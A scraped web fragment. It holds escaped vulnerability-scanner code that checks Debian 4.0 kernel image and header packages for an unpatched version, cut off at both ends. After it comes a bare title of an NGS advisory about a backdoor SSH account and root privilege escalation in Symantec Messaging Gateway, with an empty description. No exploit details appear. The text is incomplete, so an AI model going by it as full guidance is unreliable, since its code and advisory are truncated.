= isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\&quo

NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel

Description

Related